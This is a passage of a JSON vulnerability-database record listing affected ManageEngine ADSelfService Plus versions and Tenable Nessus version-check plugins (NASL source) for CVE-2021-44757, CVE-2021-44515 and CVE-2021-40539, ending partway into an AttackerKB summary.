"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5606:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5310:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5602:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5319:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4571:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5601:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5605:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4543:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5708:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5703:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5803:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5700:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4531:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4590:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4592:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4560:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5330:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5313:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5815:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5315:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5603:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5807:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4591:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4572:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5710:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5811:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5307:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4570:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5041:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5706:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5812:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5030:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5317:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5322:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5802:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5314:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4540:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5604:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5032:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5814:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5707:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.4:5400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5600:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5702:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5502:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2022-07-30T20:45:35", "description": "The ManageEngine Desktop Central application running on the remote host is affected by an authentication bypass vulnerability which allows an adversary to bypass authentication and read unauthorized data or write an arbitrary zip file on the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2022-01-18T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (CVE-2021-44757)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_9.NASL", "href": "https://www.tenable.com/plugins/nessus/156790", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156790);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2021-44757\");\n script_xref(name:\"IAVA\", value:\"2022-A-0040\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (CVE-2021-44757)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is affected by an authentication bypass\nvulnerability which allows an adversary to bypass authentication and read unauthorized data or write an arbitrary zip\nfile on the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?851289b8\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44757.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0266c4d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"See vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44757\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2137.9'},\n {'min_version':'10.1.2140', 'fixed_version':'10.1.2150', 'fixed_display':'See vendor advisory'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-15T22:42:13", "description": "The ManageEngine Desktop Central application running on the remote is affected by an authentication bypass vulnerability. An unauthenticated, remote attacker can exploit this to read sensitive information or upload an arbitrary ZIP archive to the server.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2022-03-24T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central < 10.1.2137.9 Authentication Bypass (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44757"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2021-44757.NBIN", "href": "https://www.tenable.com/plugins/nessus/159203", "sourceData": "Binary data manageengine_desktop_central_cve-2021-44757.nbin", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-07T15:05:15", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-06T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44515"], "modified": "2022-03-22T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "href": "https://www.tenable.com/plugins/nessus/155865", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155865);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/22\");\n\n script_cve_id(\"CVE-2021-44515\");\n script_xref(name:\"IAVA\", value:\"2021-A-0570\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior\nto 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to\nbypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa9e3175\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central 10.1.2127.18 / 10.1.2137.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_installed.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);\n\nvar constraints = [\n {'fixed_version':'10.1.2127.18'},\n {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-22T18:04:07", "description": "According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is prior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "href": "https://www.tenable.com/plugins/nessus/153147", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153147);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2021-40539\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"IAVA\", value:\"2021-A-0561\");\n\n script_name(english:\"ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is\nprior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An\nunauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported build\nnumber.\");\n # https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74285241\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine ADSelfService Plus build 6114 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40539\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine ADSelfService Plus CVE-2021-40539');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_adselfservice_plus\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_adselfservice_detect.nasl\");\n script_require_keys(\"installed_sw/ManageEngine ADSelfService Plus\");\n script_require_ports(\"Services/www\", 8888);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar app, app_info, constraints, port;\n\napp = 'ManageEngine ADSelfService Plus';\n\n# Exit if app is not detected on this http port\nport = get_http_port(default:8888);\n\napp_info = vcf::zoho::fix_parse::get_app_info(\n app: app,\n port: port,\n webapp: TRUE\n);\n\nconstraints = [\n { 'fixed_version':'6114', 'fixed_display':'build 6114'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T22:26:11", "description": "The ManageEngine Log360 running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "ManageEngine Log360 < Build 5229 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_log360"], "id": "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153636", "sourceData": "Binary data manageengine_log360_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T00:20:39", "description": "The ManageEngine EventLog Analyzer running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "ManageEngine EventLog Analyzer < Build 12201 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_eventlog_analyzer"], "id": "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153848", "sourceData": "Binary data manageengine_eventlog_analyzer_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T22:27:44", "description": "The Zoho ManageEngine ADSelfService Plus running on the remote host is affected by an authentication bypass vulnerability in the REST API which can lead to remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfServicePlus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/154964", "sourceData": "Binary data manageengine_adselfservice_plus_CVE-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-01-21T20:28:26", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.\n\n \n**Recent assessments:** \n \n**wvu-r7** at January 14, 2022 9:36am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 